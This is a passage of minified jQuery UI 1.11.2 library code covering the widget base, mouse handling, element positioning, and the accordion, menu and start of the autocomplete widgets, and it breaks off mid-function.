this._setOptions({disabled:!0})},_on:function(t,i,s){var n,a=this;"boolean"!=typeof t&&(s=i,i=t,t=!1),s?(i=n=e(i),this.bindings=this.bindings.add(i)):(s=i,i=this.element,n=this.widget()),e.each(s,function(s,o){function r(){return t||a.options.disabled!==!0&&!e(this).hasClass("ui-state-disabled")?("string"==typeof o?a[o]:o).apply(a,arguments):void 0}"string"!=typeof o&&(r.guid=o.guid=o.guid||r.guid||e.guid++);var h=s.match(/^([\w:-]*)\s*(.*)$/),l=h[1]+a.eventNamespace,u=h[2];u?n.delegate(u,l,r):i.bind(l,r)})},_off:function(t,i){i=(i||"").split(" ").join(this.eventNamespace+" ")+this.eventNamespace,t.unbind(i).undelegate(i),this.bindings=e(this.bindings.not(t).get()),this.focusable=e(this.focusable.not(t).get()),this.hoverable=e(this.hoverable.not(t).get())},_delay:function(e,t){function i(){return("string"==typeof e?s[e]:e).apply(s,arguments)}var s=this;return setTimeout(i,t||0)},_hoverable:function(t){this.hoverable=this.hoverable.add(t),this._on(t,{mouseenter:function(t){e(t.currentTarget).addClass("ui-state-hover")},mouseleave:function(t){e(t.currentTarget).removeClass("ui-state-hover")}})},_focusable:function(t){this.focusable=this.focusable.add(t),this._on(t,{focusin:function(t){e(t.currentTarget).addClass("ui-state-focus")},focusout:function(t){e(t.currentTarget).removeClass("ui-state-focus")}})},_trigger:function(t,i,s){var n,a,o=this.options[t];if(s=s||{},i=e.Event(i),i.type=(t===this.widgetEventPrefix?t:this.widgetEventPrefix+t).toLowerCase(),i.target=this.element[0],a=i.originalEvent)for(n in a)n in i||(i[n]=a[n]);return this.element.trigger(i,s),!(e.isFunction(o)&&o.apply(this.element[0],[i].concat(s))===!1||i.isDefaultPrevented())}},e.each({show:"fadeIn",hide:"fadeOut"},function(t,i){e.Widget.prototype["_"+t]=function(s,n,a){"string"==typeof n&&(n={effect:n});var o,r=n?n===!0||"number"==typeof n?i:n.effect||i:t;n=n||{},"number"==typeof n&&(n={duration:n}),o=!e.isEmptyObject(n),n.complete=a,n.delay&&s.delay(n.delay),o&&e.effects&&e.effects.effect[r]?s[t](n):r!==t&&s[r]?s[r](n.duration,n.easing,a):s.queue(function(i){e(this)[t](),a&&a.call(s[0]),i()})}}),e.widget;var d=!1;e(document).mouseup(function(){d=!1}),e.widget("ui.mouse",{version:"1.11.2",options:{cancel:"input,textarea,button,select,option",distance:1,delay:0},_mouseInit:function(){var t=this;this.element.bind("mousedown."+this.widgetName,function(e){return t._mouseDown(e)}).bind("click."+this.widgetName,function(i){return!0===e.data(i.target,t.widgetName+".preventClickEvent")?(e.removeData(i.target,t.widgetName+".preventClickEvent"),i.stopImmediatePropagation(),!1):void 0}),this.started=!1},_mouseDestroy:function(){this.element.unbind("."+this.widgetName),this._mouseMoveDelegate&&this.document.unbind("mousemove."+this.widgetName,this._mouseMoveDelegate).unbind("mouseup."+this.widgetName,this._mouseUpDelegate)},_mouseDown:function(t){if(!d){this._mouseMoved=!1,this._mouseStarted&&this._mouseUp(t),this._mouseDownEvent=t;var i=this,s=1===t.which,n="string"==typeof this.options.cancel&&t.target.nodeName?e(t.target).closest(this.options.cancel).length:!1;return s&&!n&&this._mouseCapture(t)?(this.mouseDelayMet=!this.options.delay,this.mouseDelayMet||(this._mouseDelayTimer=setTimeout(function(){i.mouseDelayMet=!0},this.options.delay)),this._mouseDistanceMet(t)&&this._mouseDelayMet(t)&&(this._mouseStarted=this._mouseStart(t)!==!1,!this._mouseStarted)?(t.preventDefault(),!0):(!0===e.data(t.target,this.widgetName+".preventClickEvent")&&e.removeData(t.target,this.widgetName+".preventClickEvent"),this._mouseMoveDelegate=function(e){return i._mouseMove(e)},this._mouseUpDelegate=function(e){return i._mouseUp(e)},this.document.bind("mousemove."+this.widgetName,this._mouseMoveDelegate).bind("mouseup."+this.widgetName,this._mouseUpDelegate),t.preventDefault(),d=!0,!0)):!0}},_mouseMove:function(t){if(this._mouseMoved){if(e.ui.ie&&(!document.documentMode||9>document.documentMode)&&!t.button)return this._mouseUp(t);if(!t.which)return this._mouseUp(t)}return(t.which||t.button)&&(this._mouseMoved=!0),this._mouseStarted?(this._mouseDrag(t),t.preventDefault()):(this._mouseDistanceMet(t)&&this._mouseDelayMet(t)&&(this._mouseStarted=this._mouseStart(this._mouseDownEvent,t)!==!1,this._mouseStarted?this._mouseDrag(t):this._mouseUp(t)),!this._mouseStarted)},_mouseUp:function(t){return this.document.unbind("mousemove."+this.widgetName,this._mouseMoveDelegate).unbind("mouseup."+this.widgetName,this._mouseUpDelegate),this._mouseStarted&&(this._mouseStarted=!1,t.target===this._mouseDownEvent.target&&e.data(t.target,this.widgetName+".preventClickEvent",!0),this._mouseStop(t)),d=!1,!1},_mouseDistanceMet:function(e){return Math.max(Math.abs(this._mouseDownEvent.pageX-e.pageX),Math.abs(this._mouseDownEvent.pageY-e.pageY))>=this.options.distance},_mouseDelayMet:function(){return this.mouseDelayMet},_mouseStart:function(){},_mouseDrag:function(){},_mouseStop:function(){},_mouseCapture:function(){return!0}}),function(){function t(e,t,i){return[parseFloat(e[0])*(p.test(e[0])?t/100:1),parseFloat(e[1])*(p.test(e[1])?i/100:1)]}function i(t,i){return parseInt(e.css(t,i),10)||0}function s(t){var i=t[0];return 9===i.nodeType?{width:t.width(),height:t.height(),offset:{top:0,left:0}}:e.isWindow(i)?{width:t.width(),height:t.height(),offset:{top:t.scrollTop(),left:t.scrollLeft()}}:i.preventDefault?{width:0,height:0,offset:{top:i.pageY,left:i.pageX}}:{width:t.outerWidth(),height:t.outerHeight(),offset:t.offset()}}e.ui=e.ui||{};var n,a,o=Math.max,r=Math.abs,h=Math.round,l=/left|center|right/,u=/top|center|bottom/,d=/[\+\-]\d+(\.[\d]+)?%?/,c=/^\w+/,p=/%$/,f=e.fn.position;e.position={scrollbarWidth:function(){if(void 0!==n)return n;var t,i,s=e("<div style='display:block;position:absolute;width:50px;height:50px;overflow:hidden;'><div style='height:100px;width:auto;'></div></div>"),a=s.children()[0];return e("body").append(s),t=a.offsetWidth,s.css("overflow","scroll"),i=a.offsetWidth,t===i&&(i=s[0].clientWidth),s.remove(),n=t-i},getScrollInfo:function(t){var i=t.isWindow||t.isDocument?"":t.element.css("overflow-x"),s=t.isWindow||t.isDocument?"":t.element.css("overflow-y"),n="scroll"===i||"auto"===i&&t.width<t.element[0].scrollWidth,a="scroll"===s||"auto"===s&&t.height<t.element[0].scrollHeight;return{width:a?e.position.scrollbarWidth():0,height:n?e.position.scrollbarWidth():0}},getWithinInfo:function(t){var i=e(t||window),s=e.isWindow(i[0]),n=!!i[0]&&9===i[0].nodeType;return{element:i,isWindow:s,isDocument:n,offset:i.offset()||{left:0,top:0},scrollLeft:i.scrollLeft(),scrollTop:i.scrollTop(),width:s||n?i.width():i.outerWidth(),height:s||n?i.height():i.outerHeight()}}},e.fn.position=function(n){if(!n||!n.of)return f.apply(this,arguments);n=e.extend({},n);var p,m,g,v,y,b,_=e(n.of),x=e.position.getWithinInfo(n.within),w=e.position.getScrollInfo(x),k=(n.collision||"flip").split(" "),T={};return b=s(_),_[0].preventDefault&&(n.at="left top"),m=b.width,g=b.height,v=b.offset,y=e.extend({},v),e.each(["my","at"],function(){var e,t,i=(n[this]||"").split(" ");1===i.length&&(i=l.test(i[0])?i.concat(["center"]):u.test(i[0])?["center"].concat(i):["center","center"]),i[0]=l.test(i[0])?i[0]:"center",i[1]=u.test(i[1])?i[1]:"center",e=d.exec(i[0]),t=d.exec(i[1]),T[this]=[e?e[0]:0,t?t[0]:0],n[this]=[c.exec(i[0])[0],c.exec(i[1])[0]]}),1===k.length&&(k[1]=k[0]),"right"===n.at[0]?y.left+=m:"center"===n.at[0]&&(y.left+=m/2),"bottom"===n.at[1]?y.top+=g:"center"===n.at[1]&&(y.top+=g/2),p=t(T.at,m,g),y.left+=p[0],y.top+=p[1],this.each(function(){var s,l,u=e(this),d=u.outerWidth(),c=u.outerHeight(),f=i(this,"marginLeft"),b=i(this,"marginTop"),D=d+f+i(this,"marginRight")+w.width,S=c+b+i(this,"marginBottom")+w.height,M=e.extend({},y),C=t(T.my,u.outerWidth(),u.outerHeight());"right"===n.my[0]?M.left-=d:"center"===n.my[0]&&(M.left-=d/2),"bottom"===n.my[1]?M.top-=c:"center"===n.my[1]&&(M.top-=c/2),M.left+=C[0],M.top+=C[1],a||(M.left=h(M.left),M.top=h(M.top)),s={marginLeft:f,marginTop:b},e.each(["left","top"],function(t,i){e.ui.position[k[t]]&&e.ui.position[k[t]][i](M,{targetWidth:m,targetHeight:g,elemWidth:d,elemHeight:c,collisionPosition:s,collisionWidth:D,collisionHeight:S,offset:[p[0]+C[0],p[1]+C[1]],my:n.my,at:n.at,within:x,elem:u})}),n.using&&(l=function(e){var t=v.left-M.left,i=t+m-d,s=v.top-M.top,a=s+g-c,h={target:{element:_,left:v.left,top:v.top,width:m,height:g},element:{element:u,left:M.left,top:M.top,width:d,height:c},horizontal:0>i?"left":t>0?"right":"center",vertical:0>a?"top":s>0?"bottom":"middle"};d>m&&m>r(t+i)&&(h.horizontal="center"),c>g&&g>r(s+a)&&(h.vertical="middle"),h.important=o(r(t),r(i))>o(r(s),r(a))?"horizontal":"vertical",n.using.call(this,e,h)}),u.offset(e.extend(M,{using:l}))})},e.ui.position={fit:{left:function(e,t){var i,s=t.within,n=s.isWindow?s.scrollLeft:s.offset.left,a=s.width,r=e.left-t.collisionPosition.marginLeft,h=n-r,l=r+t.collisionWidth-a-n;t.collisionWidth>a?h>0&&0>=l?(i=e.left+h+t.collisionWidth-a-n,e.left+=h-i):e.left=l>0&&0>=h?n:h>l?n+a-t.collisionWidth:n:h>0?e.left+=h:l>0?e.left-=l:e.left=o(e.left-r,e.left)},top:function(e,t){var i,s=t.within,n=s.isWindow?s.scrollTop:s.offset.top,a=t.within.height,r=e.top-t.collisionPosition.marginTop,h=n-r,l=r+t.collisionHeight-a-n;t.collisionHeight>a?h>0&&0>=l?(i=e.top+h+t.collisionHeight-a-n,e.top+=h-i):e.top=l>0&&0>=h?n:h>l?n+a-t.collisionHeight:n:h>0?e.top+=h:l>0?e.top-=l:e.top=o(e.top-r,e.top)}},flip:{left:function(e,t){var i,s,n=t.within,a=n.offset.left+n.scrollLeft,o=n.width,h=n.isWindow?n.scrollLeft:n.offset.left,l=e.left-t.collisionPosition.marginLeft,u=l-h,d=l+t.collisionWidth-o-h,c="left"===t.my[0]?-t.elemWidth:"right"===t.my[0]?t.elemWidth:0,p="left"===t.at[0]?t.targetWidth:"right"===t.at[0]?-t.targetWidth:0,f=-2*t.offset[0];0>u?(i=e.left+c+p+f+t.collisionWidth-o-a,(0>i||r(u)>i)&&(e.left+=c+p+f)):d>0&&(s=e.left-t.collisionPosition.marginLeft+c+p+f-h,(s>0||d>r(s))&&(e.left+=c+p+f))},top:function(e,t){var i,s,n=t.within,a=n.offset.top+n.scrollTop,o=n.height,h=n.isWindow?n.scrollTop:n.offset.top,l=e.top-t.collisionPosition.marginTop,u=l-h,d=l+t.collisionHeight-o-h,c="top"===t.my[1],p=c?-t.elemHeight:"bottom"===t.my[1]?t.elemHeight:0,f="top"===t.at[1]?t.targetHeight:"bottom"===t.at[1]?-t.targetHeight:0,m=-2*t.offset[1];0>u?(s=e.top+p+f+m+t.collisionHeight-o-a,e.top+p+f+m>u&&(0>s||r(u)>s)&&(e.top+=p+f+m)):d>0&&(i=e.top-t.collisionPosition.marginTop+p+f+m-h,e.top+p+f+m>d&&(i>0||d>r(i))&&(e.top+=p+f+m))}},flipfit:{left:function(){e.ui.position.flip.left.apply(this,arguments),e.ui.position.fit.left.apply(this,arguments)},top:function(){e.ui.position.flip.top.apply(this,arguments),e.ui.position.fit.top.apply(this,arguments)}}},function(){var t,i,s,n,o,r=document.getElementsByTagName("body")[0],h=document.createElement("div");t=document.createElement(r?"div":"body"),s={visibility:"hidden",width:0,height:0,border:0,margin:0,background:"none"},r&&e.extend(s,{position:"absolute",left:"-1000px",top:"-1000px"});for(o in s)t.style[o]=s[o];t.appendChild(h),i=r||document.documentElement,i.insertBefore(t,i.firstChild),h.style.cssText="position: absolute; left: 10.7432222px;",n=e(h).offset().left,a=n>10&&11>n,t.innerHTML="",i.removeChild(t)}()}(),e.ui.position,e.widget("ui.accordion",{version:"1.11.2",options:{active:0,animate:{},collapsible:!1,event:"click",header:"> li > :first-child,> :not(li):even",heightStyle:"auto",icons:{activeHeader:"ui-icon-triangle-1-s",header:"ui-icon-triangle-1-e"},activate:null,beforeActivate:null},hideProps:{borderTopWidth:"hide",borderBottomWidth:"hide",paddingTop:"hide",paddingBottom:"hide",height:"hide"},showProps:{borderTopWidth:"show",borderBottomWidth:"show",paddingTop:"show",paddingBottom:"show",height:"show"},_create:function(){var t=this.options;this.prevShow=this.prevHide=e(),this.element.addClass("ui-accordion ui-widget ui-helper-reset").attr("role","tablist"),t.collapsible||t.active!==!1&&null!=t.active||(t.active=0),this._processPanels(),0>t.active&&(t.active+=this.headers.length),this._refresh()},_getCreateEventData:function(){return{header:this.active,panel:this.active.length?this.active.next():e()}},_createIcons:function(){var t=this.options.icons;t&&(e("<span>").addClass("ui-accordion-header-icon ui-icon "+t.header).prependTo(this.headers),this.active.children(".ui-accordion-header-icon").removeClass(t.header).addClass(t.activeHeader),this.headers.addClass("ui-accordion-icons"))},_destroyIcons:function(){this.headers.removeClass("ui-accordion-icons").children(".ui-accordion-header-icon").remove()},_destroy:function(){var e;this.element.removeClass("ui-accordion ui-widget ui-helper-reset").removeAttr("role"),this.headers.removeClass("ui-accordion-header ui-accordion-header-active ui-state-default ui-corner-all ui-state-active ui-state-disabled ui-corner-top").removeAttr("role").removeAttr("aria-expanded").removeAttr("aria-selected").removeAttr("aria-controls").removeAttr("tabIndex").removeUniqueId(),this._destroyIcons(),e=this.headers.next().removeClass("ui-helper-reset ui-widget-content ui-corner-bottom ui-accordion-content ui-accordion-content-active ui-state-disabled").css("display","").removeAttr("role").removeAttr("aria-hidden").removeAttr("aria-labelledby").removeUniqueId(),"content"!==this.options.heightStyle&&e.css("height","")},_setOption:function(e,t){return"active"===e?(this._activate(t),void 0):("event"===e&&(this.options.event&&this._off(this.headers,this.options.event),this._setupEvents(t)),this._super(e,t),"collapsible"!==e||t||this.options.active!==!1||this._activate(0),"icons"===e&&(this._destroyIcons(),t&&this._createIcons()),"disabled"===e&&(this.element.toggleClass("ui-state-disabled",!!t).attr("aria-disabled",t),this.headers.add(this.headers.next()).toggleClass("ui-state-disabled",!!t)),void 0)},_keydown:function(t){if(!t.altKey&&!t.ctrlKey){var i=e.ui.keyCode,s=this.headers.length,n=this.headers.index(t.target),a=!1;switch(t.keyCode){case i.RIGHT:case i.DOWN:a=this.headers[(n+1)%s];break;case i.LEFT:case i.UP:a=this.headers[(n-1+s)%s];break;case i.SPACE:case i.ENTER:this._eventHandler(t);break;case i.HOME:a=this.headers[0];break;case i.END:a=this.headers[s-1]}a&&(e(t.target).attr("tabIndex",-1),e(a).attr("tabIndex",0),a.focus(),t.preventDefault())}},_panelKeyDown:function(t){t.keyCode===e.ui.keyCode.UP&&t.ctrlKey&&e(t.currentTarget).prev().focus()},refresh:function(){var t=this.options;this._processPanels(),t.active===!1&&t.collapsible===!0||!this.headers.length?(t.active=!1,this.active=e()):t.active===!1?this._activate(0):this.active.length&&!e.contains(this.element[0],this.active[0])?this.headers.length===this.headers.find(".ui-state-disabled").length?(t.active=!1,this.active=e()):this._activate(Math.max(0,t.active-1)):t.active=this.headers.index(this.active),this._destroyIcons(),this._refresh()},_processPanels:function(){var e=this.headers,t=this.panels;this.headers=this.element.find(this.options.header).addClass("ui-accordion-header ui-state-default ui-corner-all"),this.panels=this.headers.next().addClass("ui-accordion-content ui-helper-reset ui-widget-content ui-corner-bottom").filter(":not(.ui-accordion-content-active)").hide(),t&&(this._off(e.not(this.headers)),this._off(t.not(this.panels)))},_refresh:function(){var t,i=this.options,s=i.heightStyle,n=this.element.parent();this.active=this._findActive(i.active).addClass("ui-accordion-header-active ui-state-active ui-corner-top").removeClass("ui-corner-all"),this.active.next().addClass("ui-accordion-content-active").show(),this.headers.attr("role","tab").each(function(){var t=e(this),i=t.uniqueId().attr("id"),s=t.next(),n=s.uniqueId().attr("id");t.attr("aria-controls",n),s.attr("aria-labelledby",i)}).next().attr("role","tabpanel"),this.headers.not(this.active).attr({"aria-selected":"false","aria-expanded":"false",tabIndex:-1}).next().attr({"aria-hidden":"true"}).hide(),this.active.length?this.active.attr({"aria-selected":"true","aria-expanded":"true",tabIndex:0}).next().attr({"aria-hidden":"false"}):this.headers.eq(0).attr("tabIndex",0),this._createIcons(),this._setupEvents(i.event),"fill"===s?(t=n.height(),this.element.siblings(":visible").each(function(){var i=e(this),s=i.css("position");"absolute"!==s&&"fixed"!==s&&(t-=i.outerHeight(!0))}),this.headers.each(function(){t-=e(this).outerHeight(!0)}),this.headers.next().each(function(){e(this).height(Math.max(0,t-e(this).innerHeight()+e(this).height()))}).css("overflow","auto")):"auto"===s&&(t=0,this.headers.next().each(function(){t=Math.max(t,e(this).css("height","").height())}).height(t))},_activate:function(t){var i=this._findActive(t)[0];i!==this.active[0]&&(i=i||this.active[0],this._eventHandler({target:i,currentTarget:i,preventDefault:e.noop}))},_findActive:function(t){return"number"==typeof t?this.headers.eq(t):e()},_setupEvents:function(t){var i={keydown:"_keydown"};t&&e.each(t.split(" "),function(e,t){i[t]="_eventHandler"}),this._off(this.headers.add(this.headers.next())),this._on(this.headers,i),this._on(this.headers.next(),{keydown:"_panelKeyDown"}),this._hoverable(this.headers),this._focusable(this.headers)},_eventHandler:function(t){var i=this.options,s=this.active,n=e(t.currentTarget),a=n[0]===s[0],o=a&&i.collapsible,r=o?e():n.next(),h=s.next(),l={oldHeader:s,oldPanel:h,newHeader:o?e():n,newPanel:r};t.preventDefault(),a&&!i.collapsible||this._trigger("beforeActivate",t,l)===!1||(i.active=o?!1:this.headers.index(n),this.active=a?e():n,this._toggle(l),s.removeClass("ui-accordion-header-active ui-state-active"),i.icons&&s.children(".ui-accordion-header-icon").removeClass(i.icons.activeHeader).addClass(i.icons.header),a||(n.removeClass("ui-corner-all").addClass("ui-accordion-header-active ui-state-active ui-corner-top"),i.icons&&n.children(".ui-accordion-header-icon").removeClass(i.icons.header).addClass(i.icons.activeHeader),n.next().addClass("ui-accordion-content-active")))},_toggle:function(t){var i=t.newPanel,s=this.prevShow.length?this.prevShow:t.oldPanel;this.prevShow.add(this.prevHide).stop(!0,!0),this.prevShow=i,this.prevHide=s,this.options.animate?this._animate(i,s,t):(s.hide(),i.show(),this._toggleComplete(t)),s.attr({"aria-hidden":"true"}),s.prev().attr("aria-selected","false"),i.length&&s.length?s.prev().attr({tabIndex:-1,"aria-expanded":"false"}):i.length&&this.headers.filter(function(){return 0===e(this).attr("tabIndex")}).attr("tabIndex",-1),i.attr("aria-hidden","false").prev().attr({"aria-selected":"true",tabIndex:0,"aria-expanded":"true"})},_animate:function(e,t,i){var s,n,a,o=this,r=0,h=e.length&&(!t.length||e.index()<t.index()),l=this.options.animate||{},u=h&&l.down||l,d=function(){o._toggleComplete(i)};return"number"==typeof u&&(a=u),"string"==typeof u&&(n=u),n=n||u.easing||l.easing,a=a||u.duration||l.duration,t.length?e.length?(s=e.show().outerHeight(),t.animate(this.hideProps,{duration:a,easing:n,step:function(e,t){t.now=Math.round(e)}}),e.hide().animate(this.showProps,{duration:a,easing:n,complete:d,step:function(e,i){i.now=Math.round(e),"height"!==i.prop?r+=i.now:"content"!==o.options.heightStyle&&(i.now=Math.round(s-t.outerHeight()-r),r=0)}}),void 0):t.animate(this.hideProps,a,n,d):e.animate(this.showProps,a,n,d)},_toggleComplete:function(e){var t=e.oldPanel;t.removeClass("ui-accordion-content-active").prev().removeClass("ui-corner-top").addClass("ui-corner-all"),t.length&&(t.parent()[0].className=t.parent()[0].className),this._trigger("activate",null,e)}}),e.widget("ui.menu",{version:"1.11.2",defaultElement:"<ul>",delay:300,options:{icons:{submenu:"ui-icon-carat-1-e"},items:"> *",menus:"ul",position:{my:"left-1 top",at:"right top"},role:"menu",blur:null,focus:null,select:null},_create:function(){this.activeMenu=this.element,this.mouseHandled=!1,this.element.uniqueId().addClass("ui-menu ui-widget ui-widget-content").toggleClass("ui-menu-icons",!!this.element.find(".ui-icon").length).attr({role:this.options.role,tabIndex:0}),this.options.disabled&&this.element.addClass("ui-state-disabled").attr("aria-disabled","true"),this._on({"mousedown .ui-menu-item":function(e){e.preventDefault()},"click .ui-menu-item":function(t){var i=e(t.target);!this.mouseHandled&&i.not(".ui-state-disabled").length&&(this.select(t),t.isPropagationStopped()||(this.mouseHandled=!0),i.has(".ui-menu").length?this.expand(t):!this.element.is(":focus")&&e(this.document[0].activeElement).closest(".ui-menu").length&&(this.element.trigger("focus",[!0]),this.active&&1===this.active.parents(".ui-menu").length&&clearTimeout(this.timer)))},"mouseenter .ui-menu-item":function(t){if(!this.previousFilter){var i=e(t.currentTarget);i.siblings(".ui-state-active").removeClass("ui-state-active"),this.focus(t,i)
}},mouseleave:"collapseAll","mouseleave .ui-menu":"collapseAll",focus:function(e,t){var i=this.active||this.element.find(this.options.items).eq(0);t||this.focus(e,i)},blur:function(t){this._delay(function(){e.contains(this.element[0],this.document[0].activeElement)||this.collapseAll(t)})},keydown:"_keydown"}),this.refresh(),this._on(this.document,{click:function(e){this._closeOnDocumentClick(e)&&this.collapseAll(e),this.mouseHandled=!1}})},_destroy:function(){this.element.removeAttr("aria-activedescendant").find(".ui-menu").addBack().removeClass("ui-menu ui-widget ui-widget-content ui-menu-icons ui-front").removeAttr("role").removeAttr("tabIndex").removeAttr("aria-labelledby").removeAttr("aria-expanded").removeAttr("aria-hidden").removeAttr("aria-disabled").removeUniqueId().show(),this.element.find(".ui-menu-item").removeClass("ui-menu-item").removeAttr("role").removeAttr("aria-disabled").removeUniqueId().removeClass("ui-state-hover").removeAttr("tabIndex").removeAttr("role").removeAttr("aria-haspopup").children().each(function(){var t=e(this);t.data("ui-menu-submenu-carat")&&t.remove()}),this.element.find(".ui-menu-divider").removeClass("ui-menu-divider ui-widget-content")},_keydown:function(t){var i,s,n,a,o=!0;switch(t.keyCode){case e.ui.keyCode.PAGE_UP:this.previousPage(t);break;case e.ui.keyCode.PAGE_DOWN:this.nextPage(t);break;case e.ui.keyCode.HOME:this._move("first","first",t);break;case e.ui.keyCode.END:this._move("last","last",t);break;case e.ui.keyCode.UP:this.previous(t);break;case e.ui.keyCode.DOWN:this.next(t);break;case e.ui.keyCode.LEFT:this.collapse(t);break;case e.ui.keyCode.RIGHT:this.active&&!this.active.is(".ui-state-disabled")&&this.expand(t);break;case e.ui.keyCode.ENTER:case e.ui.keyCode.SPACE:this._activate(t);break;case e.ui.keyCode.ESCAPE:this.collapse(t);break;default:o=!1,s=this.previousFilter||"",n=String.fromCharCode(t.keyCode),a=!1,clearTimeout(this.filterTimer),n===s?a=!0:n=s+n,i=this._filterMenuItems(n),i=a&&-1!==i.index(this.active.next())?this.active.nextAll(".ui-menu-item"):i,i.length||(n=String.fromCharCode(t.keyCode),i=this._filterMenuItems(n)),i.length?(this.focus(t,i),this.previousFilter=n,this.filterTimer=this._delay(function(){delete this.previousFilter},1e3)):delete this.previousFilter}o&&t.preventDefault()},_activate:function(e){this.active.is(".ui-state-disabled")||(this.active.is("[aria-haspopup='true']")?this.expand(e):this.select(e))},refresh:function(){var t,i,s=this,n=this.options.icons.submenu,a=this.element.find(this.options.menus);this.element.toggleClass("ui-menu-icons",!!this.element.find(".ui-icon").length),a.filter(":not(.ui-menu)").addClass("ui-menu ui-widget ui-widget-content ui-front").hide().attr({role:this.options.role,"aria-hidden":"true","aria-expanded":"false"}).each(function(){var t=e(this),i=t.parent(),s=e("<span>").addClass("ui-menu-icon ui-icon "+n).data("ui-menu-submenu-carat",!0);i.attr("aria-haspopup","true").prepend(s),t.attr("aria-labelledby",i.attr("id"))}),t=a.add(this.element),i=t.find(this.options.items),i.not(".ui-menu-item").each(function(){var t=e(this);s._isDivider(t)&&t.addClass("ui-widget-content ui-menu-divider")}),i.not(".ui-menu-item, .ui-menu-divider").addClass("ui-menu-item").uniqueId().attr({tabIndex:-1,role:this._itemRole()}),i.filter(".ui-state-disabled").attr("aria-disabled","true"),this.active&&!e.contains(this.element[0],this.active[0])&&this.blur()},_itemRole:function(){return{menu:"menuitem",listbox:"option"}[this.options.role]},_setOption:function(e,t){"icons"===e&&this.element.find(".ui-menu-icon").removeClass(this.options.icons.submenu).addClass(t.submenu),"disabled"===e&&this.element.toggleClass("ui-state-disabled",!!t).attr("aria-disabled",t),this._super(e,t)},focus:function(e,t){var i,s;this.blur(e,e&&"focus"===e.type),this._scrollIntoView(t),this.active=t.first(),s=this.active.addClass("ui-state-focus").removeClass("ui-state-active"),this.options.role&&this.element.attr("aria-activedescendant",s.attr("id")),this.active.parent().closest(".ui-menu-item").addClass("ui-state-active"),e&&"keydown"===e.type?this._close():this.timer=this._delay(function(){this._close()},this.delay),i=t.children(".ui-menu"),i.length&&e&&/^mouse/.test(e.type)&&this._startOpening(i),this.activeMenu=t.parent(),this._trigger("focus",e,{item:t})},_scrollIntoView:function(t){var i,s,n,a,o,r;this._hasScroll()&&(i=parseFloat(e.css(this.activeMenu[0],"borderTopWidth"))||0,s=parseFloat(e.css(this.activeMenu[0],"paddingTop"))||0,n=t.offset().top-this.activeMenu.offset().top-i-s,a=this.activeMenu.scrollTop(),o=this.activeMenu.height(),r=t.outerHeight(),0>n?this.activeMenu.scrollTop(a+n):n+r>o&&this.activeMenu.scrollTop(a+n-o+r))},blur:function(e,t){t||clearTimeout(this.timer),this.active&&(this.active.removeClass("ui-state-focus"),this.active=null,this._trigger("blur",e,{item:this.active}))},_startOpening:function(e){clearTimeout(this.timer),"true"===e.attr("aria-hidden")&&(this.timer=this._delay(function(){this._close(),this._open(e)},this.delay))},_open:function(t){var i=e.extend({of:this.active},this.options.position);clearTimeout(this.timer),this.element.find(".ui-menu").not(t.parents(".ui-menu")).hide().attr("aria-hidden","true"),t.show().removeAttr("aria-hidden").attr("aria-expanded","true").position(i)},collapseAll:function(t,i){clearTimeout(this.timer),this.timer=this._delay(function(){var s=i?this.element:e(t&&t.target).closest(this.element.find(".ui-menu"));s.length||(s=this.element),this._close(s),this.blur(t),this.activeMenu=s},this.delay)},_close:function(e){e||(e=this.active?this.active.parent():this.element),e.find(".ui-menu").hide().attr("aria-hidden","true").attr("aria-expanded","false").end().find(".ui-state-active").not(".ui-state-focus").removeClass("ui-state-active")},_closeOnDocumentClick:function(t){return!e(t.target).closest(".ui-menu").length},_isDivider:function(e){return!/[^\-\u2014\u2013\s]/.test(e.text())},collapse:function(e){var t=this.active&&this.active.parent().closest(".ui-menu-item",this.element);t&&t.length&&(this._close(),this.focus(e,t))},expand:function(e){var t=this.active&&this.active.children(".ui-menu ").find(this.options.items).first();t&&t.length&&(this._open(t.parent()),this._delay(function(){this.focus(e,t)}))},next:function(e){this._move("next","first",e)},previous:function(e){this._move("prev","last",e)},isFirstItem:function(){return this.active&&!this.active.prevAll(".ui-menu-item").length},isLastItem:function(){return this.active&&!this.active.nextAll(".ui-menu-item").length},_move:function(e,t,i){var s;this.active&&(s="first"===e||"last"===e?this.active["first"===e?"prevAll":"nextAll"](".ui-menu-item").eq(-1):this.active[e+"All"](".ui-menu-item").eq(0)),s&&s.length&&this.active||(s=this.activeMenu.find(this.options.items)[t]()),this.focus(i,s)},nextPage:function(t){var i,s,n;return this.active?(this.isLastItem()||(this._hasScroll()?(s=this.active.offset().top,n=this.element.height(),this.active.nextAll(".ui-menu-item").each(function(){return i=e(this),0>i.offset().top-s-n}),this.focus(t,i)):this.focus(t,this.activeMenu.find(this.options.items)[this.active?"last":"first"]())),void 0):(this.next(t),void 0)},previousPage:function(t){var i,s,n;return this.active?(this.isFirstItem()||(this._hasScroll()?(s=this.active.offset().top,n=this.element.height(),this.active.prevAll(".ui-menu-item").each(function(){return i=e(this),i.offset().top-s+n>0}),this.focus(t,i)):this.focus(t,this.activeMenu.find(this.options.items).first())),void 0):(this.next(t),void 0)},_hasScroll:function(){return this.element.outerHeight()<this.element.prop("scrollHeight")},select:function(t){this.active=this.active||e(t.target).closest(".ui-menu-item");var i={item:this.active};this.active.has(".ui-menu").length||this.collapseAll(t,!0),this._trigger("select",t,i)},_filterMenuItems:function(t){var i=t.replace(/[\-\[\]{}()*+?.,\\\^$|#\s]/g,"\\$&"),s=RegExp("^"+i,"i");return this.activeMenu.find(this.options.items).filter(".ui-menu-item").filter(function(){return s.test(e.trim(e(this).text()))})}}),e.widget("ui.autocomplete",{version:"1.11.2",defaultElement:"<input>",options:{appendTo:null,autoFocus:!1,delay:300,minLength:1,position:{my:"left top",at:"left bottom",collision:"none"},source:null,change:null,close:null,focus:null,open:null,response:null,search:null,select:null},requestIndex:0,pending:0,_create:function(){var t,i,s,n=this.element[0].nodeName.toLowerCase(),a="textarea"===n,o="input"===n;this.isMultiLine=a?!0:o?!1:this.element.prop("isContentEditable"),this.valueMethod=this.element[a||o?"val":"text"],this.isNewMenu=!0,this.element.addClass("ui-autocomplete-input").attr("autocomplete","off"),this._on(this.element,{keydown:function(n){if(this.element.prop("readOnly"))return t=!0,s=!0,i=!0,void 0;t=!1,s=!1,i=!1;var a=e.ui.keyCode;switch(n.keyCode){case a.PAGE_UP:t=!0,this._move("previousPage",n);break;case a.PAGE_DOWN:t=!0,this._move("nextPage",n);break;case a.UP:t=!0,this._keyEvent("previous",n);break;case a.DOWN:t=!0,this._keyEvent("next",n);break;case a.ENTER:this.menu.active&&(t=!0,n.preventDefault(),this.menu.select(n));break;case a.TAB:this.menu.active&&this.menu.select(n);break;case 